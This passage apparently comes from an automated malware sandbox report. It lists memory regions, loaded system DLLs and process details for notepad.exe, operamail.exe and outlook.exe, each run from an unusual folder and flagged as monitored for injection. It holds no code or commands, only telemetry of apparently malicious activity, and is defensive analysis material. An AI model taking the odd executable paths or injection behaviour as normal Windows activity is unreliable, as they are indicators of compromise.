"c:\\windows\\syswow64\\sspicli.dll") Region: id = 2226 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2227 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2228 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2229 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2230 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2231 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2232 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2233 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2234 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2235 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2236 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2237 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2238 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2239 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2240 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2241 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2242 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2243 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2245 start_va = 0x6c0000 end_va = 0x7a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 112 os_tid = 0xf78 Thread: id = 113 os_tid = 0xeec Process: id = "23" image_name = "notepad.exe" filename = "c:\\program files\\windows portable devices\\notepad.exe" page_root = "0x646d5000" os_pid = "0xfa4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\notepad.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2246 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2247 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2248 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2249 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2250 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2251 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2252 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2253 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2254 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2255 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2256 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2257 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2258 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2259 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2260 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2261 start_va = 0x540000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2262 start_va = 0x740000 end_va = 0x7fbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2263 start_va = 0x8c0000 end_va = 0x8d6fff monitored = 0 entry_point = 0x8c14a1 region_type = mapped_file name = "notepad.exe" filename = "\\Program Files\\Windows Portable Devices\\notepad.exe" (normalized: "c:\\program files\\windows portable devices\\notepad.exe") Region: id = 2264 start_va = 0x8e0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2265 start_va = 0xa70000 end_va = 0xbf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 2266 start_va = 0xc00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 2267 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 2268 start_va = 0x2190000 end_va = 0x2b53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 2269 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2270 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2271 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2272 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2273 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2274 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2275 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2276 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2277 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2278 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2279 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2280 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2281 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2282 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2283 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2284 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2285 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2286 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2287 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2288 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2289 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2290 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2291 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2292 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2293 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2294 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2296 start_va = 0x2b60000 end_va = 0x2ce8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b60000" filename = "" Thread: id = 114 os_tid = 0xfac Thread: id = 115 os_tid = 0xfa0 Process: id = "24" image_name = "operamail.exe" filename = "c:\\program files (x86)\\windowspowershell\\operamail.exe" page_root = "0x125df000" os_pid = "0xa14" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\WindowsPowerShell\\operamail.exe\" " cur_dir = "C:\\Program Files (x86)\\WindowsPowerShell\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2298 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2299 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2300 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2301 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2302 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2303 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2304 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2305 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2306 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2307 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2308 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2309 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2310 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2311 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2312 start_va = 0x5a0000 end_va = 0x65dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2313 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2314 start_va = 0x8f0000 end_va = 0xa70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 2315 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2316 start_va = 0xb00000 end_va = 0xbbbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 2317 start_va = 0xc10000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 2318 start_va = 0x12b0000 end_va = 0x12c6fff monitored = 0 entry_point = 0x12b14a1 region_type = mapped_file name = "operamail.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\operamail.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\operamail.exe") Region: id = 2319 start_va = 0x12d0000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 2320 start_va = 0x26d0000 end_va = 0x3093fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026d0000" filename = "" Region: id = 2321 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2322 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2323 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2324 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2325 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2326 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2327 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2328 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2329 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2330 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2331 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2332 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2333 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2334 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2335 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2336 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2337 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2338 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2339 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2340 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2341 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2342 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2343 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2344 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2345 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2346 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2348 start_va = 0xc20000 end_va = 0xd39fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Thread: id = 116 os_tid = 0x1004 Thread: id = 117 os_tid = 0xc2c Process: id = "25" image_name = "outlook.exe" filename = "c:\\program files (x86)\\microsoft office\\outlook.exe" page_root = "0x579e9000" os_pid = "0xfa8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\outlook.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Office\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2349 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2350 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2351 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2352 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2353 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2354 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2355 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2356 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2357 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2358 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2359 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2360 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2361 start_va = 0x270000 end_va = 0x286fff monitored = 0 entry_point = 0x2714a1 region_type = mapped_file name = "outlook.exe" filename = "\\Program Files (x86)\\Microsoft Office\\outlook.exe" (normalized: "c:\\program files (x86)\\microsoft office\\outlook.exe") Region: id = 2362 start_va 